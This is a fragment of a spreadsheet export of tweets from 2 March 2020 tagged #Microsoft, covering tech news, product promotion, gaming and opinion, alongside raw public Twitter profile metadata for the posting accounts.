    <t>{'id': 16851793, 'id_str': '16851793', 'name': 'Kamlesh Â®', 'screen_name': 'kamleshrao', 'location': 'Bengaluru, India', 'description': 'IT Prosumer | #SharePoint MVP Reconnect | Learning &amp; traveling with Desktop, Database, Web, Mobile, Cloud &amp; OpenSource | Likes keyboard; Dislikes touchpad', 'url': 'https://t.co/hhk3FOrbkz', 'entities': {'url': {'urls': [{'url': 'https://t.co/hhk3FOrbkz', 'expanded_url': 'http://ceekam.com/blog', 'display_url': 'ceekam.com/blog', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1174, 'friends_count': 1488, 'listed_count': 188, 'created_at': 'Sun Oct 19 14:52:42 +0000 2008', 'favourites_count': 3920, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 17552, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme5/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1001820079/kamlesh-india_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1001820079/kamlesh-india_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/16851793/1423735482', 'profile_link_color': '08A4F2', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'FFFFFF', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'regular'}</t>
  </si>
  <si>
    <t>Mon Mar 02 04:09:05 +0000 2020</t>
  </si>
  <si>
    <t>Intel delays 10nm Cannon Lake processor production to late 2019. #gogadgets #microsoft https://t.co/7ZcCDHIuE7 https://t.co/9AL4AvHqPu</t>
  </si>
  <si>
    <t>{'id': 752036644035919872, 'id_str': '752036644035919872', 'name': 'Daniel aDulla', 'screen_name': 'danieladulla', 'location': 'Baltimore, MD', 'description': 'New tech style', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 5705, 'friends_count': 4768, 'listed_count': 41, 'created_at': 'Sun Jul 10 07:08:03 +0000 2016', 'favourites_count': 12989, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3538, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/784461958863065090/y3-PShL7_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/784461958863065090/y3-PShL7_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/752036644035919872/1475865214',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</si>
  <si>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04:06:50 +0000 2020</t>
  </si>
  <si>
    <t>Very comprehensive article about game streaming
#Nvidia
#Google
#Microsoft
#Sony
https://t.co/6DKgLUoDzn</t>
  </si>
  <si>
    <t>{'id': 1928085013, 'id_str': '1928085013', 'name': 'Amin Emrani', 'screen_name': 'amin_emrani', 'location': 'Pasadena, CA', 'description': '', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 65, 'friends_count': 125, 'listed_count': 0, 'created_at': 'Wed Oct 02 20:10:50 +0000 2013', 'favourites_count': 471, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 337,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'http://pbs.twimg.com/profile_images/1074608256553631744/-VKi5aFa_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1074608256553631744/-VKi5aFa_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1928085013/1545041552',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</si>
  <si>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04:05:06 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has cancelled its ''IoT in Action'' conference in Melbourne owing to the new Coronavirus outbreak.
https://t.co/BuWo9r3a3x
@Microsoft #IoT #Melbourne #CoronaVirusUpdate #Coronavirus #Microsoft</t>
  </si>
  <si>
    <t>{'id': 1100428439633289216, 'id_str': '1100428439633289216', 'name': 'India Updates', 'screen_name': '_Indiaupdates', 'location': 'New Delhi, India', 'description': 'India Updates is an independent news &amp; Information Website. We provide Important updates, News that matters to you.', 'url': 'https://t.co/vojqKmQfGT', 'entities': {'url': {'urls': [{'url': 'https://t.co/vojqKmQfGT', 'expanded_url': 'https://indiaupdates.in', 'display_url': 'indiaupdates.in', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 137, 'friends_count': 100, 'listed_count': 1, 'created_at': 'Tue Feb 26 16:12:39 +0000 2019', 'favourites_count': 18, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 3913,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'http://pbs.twimg.com/profile_images/1100431395791355904/e6p_BwAB_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1100431395791355904/e6p_BwAB_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1100428439633289216/1571705679',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</si>
  <si>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04:05:04 +0000 2020</t>
  </si>
  <si>
    <t>Storage Spaces Direct is an important part of the modern Windows administrator's toolbox but there are 3 important things you should know before using it #Microsoft #HyperV https://t.co/77IU3E6dbq</t>
  </si>
  <si>
    <t>Mon Mar 02 04:01:20 +0000 2020</t>
  </si>
  <si>
    <t>Have you ever considered that fusing art, tech and science can address issues like pollution exposure, mental health &amp;amp; other challenges facing society? Watch to learn more from Asta Roseway, #Microsoft Principal Research Designer/Fusionist. https://t.co/hODPWO4LhU</t>
  </si>
  <si>
    <t>Mon Mar 02 03:58:19 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 03:53:00 +0000 2020</t>
  </si>
  <si>
    <t>Quick Solutions to Customer Pain Points in Excel 
https://t.co/c48DQp4kpK 
#microsoft #excel #data #reports #technology #office #seminars #accountants #issquared</t>
  </si>
  <si>
    <t>Mon Mar 02 03:50:14 +0000 2020</t>
  </si>
  <si>
    <t>Azure Cost Management + Billing updates  February 2020https://zcu.io/1zG0 
#Azure #Microsoft #hybridcloud #cloud #clouds #technology #powerBI #devops #dataanalytics #issquared</t>
  </si>
  <si>
    <t>Mon Mar 02 03:49:03 +0000 2020</t>
  </si>
  <si>
    <t>Uighurs in China in 'forced labour" for 83 well-known global brands, including Nike, Microsoft, Apple and Dell.
#Uighurs #Uighur #China #ForcedLabor #Apple #Nike #TimCook #DellComputers #Dell #Acer #Adidas #Alstom #Amazon, #BMW #Mercedes #Microsoft  https://t.co/06JaqoypQy</t>
  </si>
  <si>
    <t>{'id': 131074139, 'id_str': '131074139', 'name': 'Max H', 'screen_name': 'DuckTalesW00H00', 'location': '', 'description': '#ConsumerRights #NetNeutrality #DigitalRights #ConsumerProtection #DataRights', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 667, 'friends_count': 797, 'listed_count': 107, 'created_at': 'Fri Apr 09 05:29:02 +0000 2010', 'favourites_count': 121643, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 40767,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'http://pbs.twimg.com/profile_images/1116027200996667392/ICS99YO4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1116027200996667392/ICS99YO4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/131074139/1566924029',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</si>
  <si>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03:46:03 +0000 2020</t>
  </si>
  <si>
    <t>Register today for @Axway and @Microsoft webinar on February 27th (French) &amp;amp; March 5th (English version). Discover how Axway #AMPLIFY API Management on @azure benefits your company. #apimanagement #hybrid #microsoft https://t.co/YXk94JMvg5 https://t.co/DZqFSNqKJW</t>
  </si>
  <si>
    <t>Mon Mar 02 03:41:41 +0000 2020</t>
  </si>
  <si>
    <t>Me and @fiqriismail will be doing a #AppInADay session at SLIIT on 6th March, All the undergrads are welcome :)  #MVP #MIcrosoft #Community #aspdotnetcore #dotnetcore3.1 #react https://t.co/eDgvLdugK3</t>
  </si>
  <si>
    <t>{'id': 820321467594326017, 'id_str': '820321467594326017', 'name': 'hansamali gamage', 'screen_name': 'HansamaliGamage', 'location': 'Sri Lanka', 'description': 'Coder | Blogger | Speaker | MVP | MCT', 'url': 'https://t.co/gRJdpqiHsK', 'entities': {'url': {'urls': [{'url': 'https://t.co/gRJdpqiHsK', 'expanded_url': 'http://hansamaligamage.blogspot.com/', 'display_url': 'hansamaligamage.blogspot.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 225, 'friends_count': 125, 'listed_count': 8, 'created_at': 'Sat Jan 14 17:27:33 +0000 2017', 'favourites_count': 782, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 803, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/975006104634777600/5k4G-LvS_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/975006104634777600/5k4G-LvS_normal.jpg',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</si>
  <si>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03:39:31 +0000 2020</t>
  </si>
  <si>
    <t>Weeks down the line, Linux Foundation with #microsoft proxies continue to generate negative press about FOSS (to help sell proprietary software)  https://t.co/rMLZ9obI6J</t>
  </si>
  <si>
    <t>Mon Mar 02 03:34:51 +0000 2020</t>
  </si>
  <si>
    <t>#murdoch rags the latest to promote #microsoft #fakenews that distract from participation in #crimesagainsthumanity at #github</t>
  </si>
  <si>
    <t>Mon Mar 02 03:30:12 +0000 2020</t>
  </si>
  <si>
    <t>ICYMI: BlackBerry, Microsoft and other heavy hitters drop product announcements at RSA Conference 
#cdntech #itbnews #blackberrry #microsoft #rsa #rsaconference
https://t.co/jxY6zIFvmx</t>
  </si>
  <si>
    <t>Mon Mar 02 03:28:18 +0000 2020</t>
  </si>
  <si>
    <t>Loot Boxes Will Be Phased Out From Forza Motorsport 7. #microsoft #newestgadgets https://t.co/vANZhQwQOC https://t.co/o9V0yfGqYv</t>
  </si>
  <si>
    <t>Mon Mar 02 03:25:54 +0000 2020</t>
  </si>
  <si>
    <t>Raspberry Pi 4 vs NVIDIA #JetsonNano Developer Kit
 #RaspberryPi #IoT #Microsoft
https://t.co/1vSwZwrPZH</t>
  </si>
  <si>
    <t>Mon Mar 02 03:22:54 +0000 2020</t>
  </si>
  <si>
    <t>#xboxone #microsoft I get home a weekend of roller coaster, and I find a really great new user interface on the Xbox One.</t>
  </si>
  <si>
    <t>{'id': 921012906086621184, 'id_str': '921012906086621184', 'name': 'M. S.', 'screen_name': 'HarlockofAvalon', 'location': '', 'description': 'Cast in the name of God, ye not guilty.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 52, 'friends_count': 153, 'listed_count': 0, 'created_at': 'Thu Oct 19 13:59:23 +0000 2017', 'favourites_count': 13134, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1626,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'http://pbs.twimg.com/profile_images/1122658456475979776/ZrGN94ru_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1122658456475979776/ZrGN94ru_normal.png',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</si>
  <si>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03:19:56 +0000 2020</t>
  </si>
  <si>
    <t>A mood and a half 
#GodTier #AmbitionsAsAgamer #suge #pac #IrealyDoThis #Microsoft #Xbox #SeriesX #PS5 #Gaming #clip #videogames  #nextgen #abg #zillla #zilllathegod #twitch #esports https://t.co/lcRlqoHyg0</t>
  </si>
  <si>
    <t>Mon Mar 02 03:19:07 +0000 2020</t>
  </si>
  <si>
    <t>Any Business Central users that love March Madness? We have a special bracket just for you 
https://t.co/XaHujPc0x3
#Microsoft #MarchMadness #ERP #Basketball #Business #SMB #MSDyn365 #BusinessCentral #Games #Bracket #Bracketology | Microsoft MSDYN365BC https://t.co/7bLtpYJJMo</t>
  </si>
  <si>
    <t>Mon Mar 02 03:19:06 +0000 2020</t>
  </si>
  <si>
    <t>#cloud  #microsoft     Watch this 28-second video to get a 10,000-foot view on how #MSDyn365BC connects businesses, enables smarter decisions, and helps foster growth. #MSDyn365 #Technology #IT https://t.co/gE7cSAoUFj</t>
  </si>
  <si>
    <t>Mon Mar 02 03:16:43 +0000 2020</t>
  </si>
  <si>
    <t>Former #Microsoft employee stole 10 million dollars in #digitalcurrency. #InsiderThreat  https://t.co/9qjyzOSR2j</t>
  </si>
  <si>
    <t>{'id': 47812463, 'id_str': '47812463', 'name': 'JulieJulieJulie', 'screen_name': 'SuperUltraJulie', 'location': 'MD-VA-DC Metro Area', 'description': "Wife,mom,volunteer #FireAndRescue, #USNavyVet, #CISM, #InfoSec Maven &amp; #CyberSecurity DemiGoddess. Goddess ATO Pending! Views shared=mine. RTs DON'T=endorsement", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 336, 'friends_count': 269, 'listed_count': 121, 'created_at': 'Wed Jun 17 01:51:12 +0000 2009', 'favourites_count': 40, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 5147,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'http://pbs.twimg.com/profile_images/1223800697298345985/iF1LZT2w_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1223800697298345985/iF1LZT2w_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/47812463/1482352653',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</si>
  <si>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Mon Mar 02 03:16:00 +0000 2020</t>
  </si>
  <si>
    <t>Magic SignIn &amp;amp; Invitation Mails in Azure AD B2C
https://t.co/oFUKobLaHf 
#Microsoft #azure #invitation #activedirectory #technology #authentication #identity #security #issquared</t>
  </si>
  <si>
    <t>Mon Mar 02 03:15:10 +0000 2020</t>
  </si>
  <si>
    <t>Stand Out from the Crowd with MCT  Train the Trainer Certification  #Microsoft Approved - Enhance your Career  Get Certified  - https://t.co/cVkaPu7HDg https://t.co/0dsubj34mR</t>
  </si>
  <si>
    <t>Mon Mar 02 03:13:42 +0000 2020</t>
  </si>
  <si>
    <t>via #BleepingComputer Blog: "Windows 10 1909 Starts Getting Microsoft's New Fluent Icons:" https://t.co/YQErxmUJQR
.
.
.
#Microsoft #Linux #blog #virtualization #cloudcomputing #cloud #security #ransomeware</t>
  </si>
  <si>
    <t>Mon Mar 02 03:05:22 +0000 2020</t>
  </si>
  <si>
    <t>Application Modernization | Link &amp;gt;&amp;gt; https://t.co/nNNfNVwiwv 
#Applicationmodernization #Aws #Azure #Cloud #Microsoft #Publiccloud #Technology https://t.co/ETITj9iH2A</t>
  </si>
  <si>
    <t>Mon Mar 02 03:00:49 +0000 2020</t>
  </si>
  <si>
    <t>Avanade offers #Microsoft #Dynamics AX Development Services covering Mobile Apps, Integraions, ERP and CRM --&amp;gt; https://t.co/NCQlRwXE4o &amp;lt;-- March 01, 2020 at 10:00PM</t>
  </si>
  <si>
    <t>Mon Mar 02 03:00:21 +0000 2020</t>
  </si>
  <si>
    <t>This is big!
Microsoft Is Investing Over $1 Billion in This Unloved Emerging Market @themotleyfool #stocks $MSFT $AMZN $WMT https://t.co/9kBY4LCzJv 
#Microsoft #Mexico #Growth #Billion</t>
  </si>
  <si>
    <t>{'id': 344503528, 'id_str': '344503528', 'name': 'Sales.mx', 'screen_name': 'salesmx', 'location': 'The Internet', 'description': 'Sales and project development from .mx Pushing the boundaries of ecommerce and growth.', 'url': 'http://t.co/pytqYEbTUT', 'entities': {'url': {'urls': [{'url': 'http://t.co/pytqYEbTUT', 'expanded_url': 'http://sales.mx', 'display_url': 'sales.mx', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1035, 'friends_count': 3946, 'listed_count': 7, 'created_at': 'Fri Jul 29 04:40:26 +0000 2011', 'favourites_count': 355, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 748,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'http://pbs.twimg.com/profile_images/1467012685/mx-gravatar_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1467012685/mx-gravatar_normal.jpg',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</si>
  <si>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Mon Mar 02 03:00:09 +0000 2020</t>
  </si>
  <si>
    <t>Check this article that shows A Guide to Achieve Maximum Profit with Financial Management!
https://t.co/0eX4OTR4QO
#logiframe #advisory #technology #outsourcing #microsoft #xero #jakarta #southjakarta #startup #startuplife #consulting #consultancy #business #fintech https://t.co/pEcsgxjrto</t>
  </si>
  <si>
    <t>{'id': 2258898152, 'id_str': '2258898152', 'name': 'Logiframe', 'screen_name': 'logiframe_ID', 'location': 'Jakarta, Indonesia', 'description': 'Advisory | Technology | Outsourcing.\nInspire the world to run and execute better, and improving peopleâ€™s lives.', 'url': 'https://t.co/zYl8OzaBo6', 'entities': {'url': {'urls': [{'url': 'https://t.co/zYl8OzaBo6', 'expanded_url': 'https://www.logiframe.com/id/', 'display_url': 'logiframe.com/id/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 128, 'friends_count': 591, 'listed_count': 7, 'created_at': 'Mon Dec 23 12:57:26 +0000 2013', 'favourites_count': 0, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 423,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'http://pbs.twimg.com/profile_images/415105808322400256/lwXIzjrb_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/415105808322400256/lwXIzjrb_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/2258898152/1537864662',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</si>
  <si>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03:00:06 +0000 2020</t>
  </si>
  <si>
    <t>With #ExpressRoute Global Reach, we are democratizing connectivity ! #Microsoft #Azure Jared Ross https://t.co/651y2q4Yar #MSFTAdvocate</t>
  </si>
  <si>
    <t>Mon Mar 02 03:00:04 +0000 2020</t>
  </si>
  <si>
    <t>"...while not every tech business has the scope of #Microsoft, there are seven dimensions of #AI that all companies in the field should recognise and explore in order to achieve the same-targeted levels of power, ethics,    #Avtex https://t.co/krgYglEla2</t>
  </si>
  <si>
    <t>{'id': 41572713, 'id_str': '41572713', 'name': 'Steven Jacobowitz', 'screen_name': 'stevejna', 'location': 'Derby, CT', 'description': 'Senior CRM Leader â–º Passion for Innovation &amp; Product Development | Driving Digital Transformation &amp; Process Improvements', 'url': 'https://t.co/7rmQXyUdxR', 'entities': {'url': {'urls': [{'url': 'https://t.co/7rmQXyUdxR', 'expanded_url': 'http://www.stevenjacobowitz.com', 'display_url': 'stevenjacobowitz.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 289, 'friends_count': 503, 'listed_count': 11, 'created_at': 'Thu May 21 11:59:42 +0000 2009', 'favourites_count': 401, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 10034,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'http://pbs.twimg.com/profile_images/763123419479105537/Usqt6GD4_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/763123419479105537/Usqt6GD4_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/41572713/1495483848',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</si>
  <si>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Mon Mar 02 03:00:00 +0000 2020</t>
  </si>
  <si>
    <t>"How #SatyaNadella and the #Cloud Turned #Microsoft Around" | @themotleyfool https://t.co/uEeDuQddHB</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:37 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:35 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#PowerApps #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Power BI #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:34 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Microsoft Cloud #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:33 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:32 +0000 2020</t>
  </si>
  <si>
    <t>From tech adoption to tech creation: Customers across industries are using advanced cloud and AI tools to build their own digital solutions
#Azure #Microsoft
https://t.co/6SJe2f3cA8</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:31 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:30 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:29 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:27 +0000 2020</t>
  </si>
  <si>
    <t>Black History Month: Building a better future together
#Blacks at Microsoft #Microsoft
https://t.co/3KnEbF3AWq</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:26 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:25 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:24 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:23 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:21 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:20 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:19 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:18 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:17 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:16 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:15 +0000 2020</t>
  </si>
  <si>
    <t>Mon Mar 02 02:55:07 +0000 2020</t>
  </si>
  <si>
    <t>My team need some meds and the enemy team came in for the rescue!  follow my https://t.co/WJ4XNRUU94 if you like my content  #ApexLegends #apexclips
#battleroyal #microsoft #XboxOne 
#PS4 #pc #gaming #gamer https://t.co/K7JEOHF8Yd</t>
  </si>
  <si>
    <t>Mon Mar 02 02:51:41 +0000 2020</t>
  </si>
  <si>
    <t>Windows 10 1909 Starts Getting #Microsoft's New Fluent Icons
https://t.co/de4vvVeAJO https://t.co/cPqgT5qjiT</t>
  </si>
  <si>
    <t>Mon Mar 02 02:39:20 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft, #IBM, and #Amazon are under pressure to drop #gender labels from #AI tools  https://t.co/NkaNwJZok6</t>
  </si>
  <si>
    <t>{'id': 952259558, 'id_str': '952259558', 'name': 'Urvashi', 'screen_name': 'UrvashiPrakash', 'location': 'Boardroom', 'description': 'CDM decoding Value. Specialist in Need vs Want. #fintech #banking #insurtech #AI #Oceans #RenewableEnergy #Sustainability', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1282, 'friends_count': 683, 'listed_count': 987, 'created_at': 'Fri Nov 16 19:16:42 +0000 2012', 'favourites_count': 50934, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4033,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'http://pbs.twimg.com/profile_images/1224525423482036224/oh8dnmTq_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1224525423482036224/oh8dnmTq_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/952259558/1551154150', 'profile_link_color': 'FF691F',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</si>
  <si>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02:30:00 +0000 2020</t>
  </si>
  <si>
    <t>List of Top 5 most valuable companies in the world
:
:
:
:
#stockmarketindia  #nifty50 #Nifty #daytrading #chalopaisakamatehai #mukulagrawal #agrawalcorporate #technicalanalysis #stockmarket #india #apple #microsoft #alphabet #amazon #saudiarmaco https://t.co/BgaDuCbTkv</t>
  </si>
  <si>
    <t>Mon Mar 02 02:29:54 +0000 2020</t>
  </si>
  <si>
    <t>#SharePoint #Office365 #Microsoft  - Use your intranet for establishing a Knowledge Management solution  https://t.co/IwNtltwrGT</t>
  </si>
  <si>
    <t>Mon Mar 02 02:22:37 +0000 2020</t>
  </si>
  <si>
    <t>@nytimes I guess #Microsoft employees will be working from home for the next couple of months.</t>
  </si>
  <si>
    <t>{'id': 868272635553038336, 'id_str': '868272635553038336', 'name': 'Reality Has a Liberal Bias ðŸŒŠ', 'screen_name': 'Liberal_Bias', 'location': 'USA', 'description': 'â€œWhat a terrible era in which idiots govern the blind.â€\nâ€• William Shakespeare, Julius Caesar', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 162, 'friends_count': 280, 'listed_count': 0, 'created_at': 'Sat May 27 01:08:22 +0000 2017', 'favourites_count': 12610, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2194, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1220268998928912384/TL-KP20A_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1220268998928912384/TL-KP20A_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/868272635553038336/1579735666',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</si>
  <si>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02:18:36 +0000 2020</t>
  </si>
  <si>
    <t>Honestly excited that I can mirror my phone on my PC now thanks to #Microsoft. https://t.co/lsNJtsIm5h</t>
  </si>
  <si>
    <t>{'id': 298492495, 'id_str': '298492495', 'name': 'Jotaro Shima', 'screen_name': 'jotaro_shima', 'location': 'Saint Paul, Minnesota', 'description': 'Gamer, streamer, anime nerd, YouTuber, and cosplayer.', 'url': 'https://t.co/r7NMCLlBd4', 'entities': {'url': {'urls': [{'url': 'https://t.co/r7NMCLlBd4', 'expanded_url': 'https://linktr.ee/jotaro_shima', 'display_url': 'linktr.ee/jotaro_shima', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 101, 'friends_count': 138, 'listed_count': 28, 'created_at': 'Sat May 14 12:12:31 +0000 2011', 'favourites_count': 2923, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 8741,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'http://pbs.twimg.com/profile_images/933084502666203137/92FL_KyZ_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/933084502666203137/92FL_KyZ_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/298492495/1514863665',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</si>
  <si>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02:10:04 +0000 2020</t>
  </si>
  <si>
    <t>Microsoft has a subdomain hijacking problem #cybersecurity #microsoft https://t.co/j5KwZTS57A</t>
  </si>
  <si>
    <t>{'id': 18910068, 'id_str': '18910068', 'name': 'Kenneth Holley', 'screen_name': 'kennethholley', 'location': 'Washington, DC  â€¢  Austin', 'description': "It's all about who you know and who you trust â€¢ There's never any rest for the terminally ambitious â€¢ CEO @silentquadrant â€¢ Privacy advocate â€¢ Former @USNavy", 'url': 'https://t.co/vEHw74MAi5', 'entities': {'url': {'urls': [{'url': 'https://t.co/vEHw74MAi5', 'expanded_url': 'http://silentquadrant.com', 'display_url': 'silentquadrant.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 55625, 'friends_count': 12920, 'listed_count': 955, 'created_at': 'Mon Jan 12 18:41:47 +0000 2009', 'favourites_count': 19669, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 37180,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'http://pbs.twimg.com/profile_images/840923965635854336/MNxnepsk_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/840923965635854336/MNxnepsk_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/18910068/1498315990',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</si>
  <si>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Mon Mar 02 02:10:02 +0000 2020</t>
  </si>
  <si>
    <t>[Microsoft Azure]
https://t.co/oRI5zaaRBE
[Featured article]
Use Blazor and C# to host a static website in Azure Storage
https://t.co/SazymqdW8N
#Microsoft Azure</t>
  </si>
  <si>
    <t>{'id': 1124098951030853632, 'id_str': '1124098951030853632', 'name': 'Tech-Run', 'screen_name': 'TechRunEn', 'location': '', 'description': 'Tech-Run support technical information gathering for programmers. Here, we tweet hot technical information.', 'url': 'https://t.co/E1HhQUKlbI', 'entities': {'url': {'urls': [{'url': 'https://t.co/E1HhQUKlbI', 'expanded_url': 'https://www.tech-run.net/en/', 'display_url': 'tech-run.net/en/', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 80, 'friends_count': 35, 'listed_count': 0, 'created_at': 'Thu May 02 23:50:49 +0000 2019', 'favourites_count': 2, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4171, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1124228816866463745/i8ls5hho_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1124228816866463745/i8ls5hho_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1124098951030853632/1556872338',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</si>
  <si>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02:04:23 +0000 2020</t>
  </si>
  <si>
    <t>Just earned the Introduction to Power Platform badge in #Microsoft https://t.co/nLE5VWwPhO</t>
  </si>
  <si>
    <t>Mon Mar 02 02:04:01 +0000 2020</t>
  </si>
  <si>
    <t>DON'T MISS the #Dubai stop of the HPE &amp;amp; #Microsoft #HybridCloud Roadshow on 11th March. More info here: https://t.co/z80k13wobk
#HPEalliances #UAE #DubaiDigital #UAEtech #HybridIT https://t.co/MZ3HKm9G6Z</t>
  </si>
  <si>
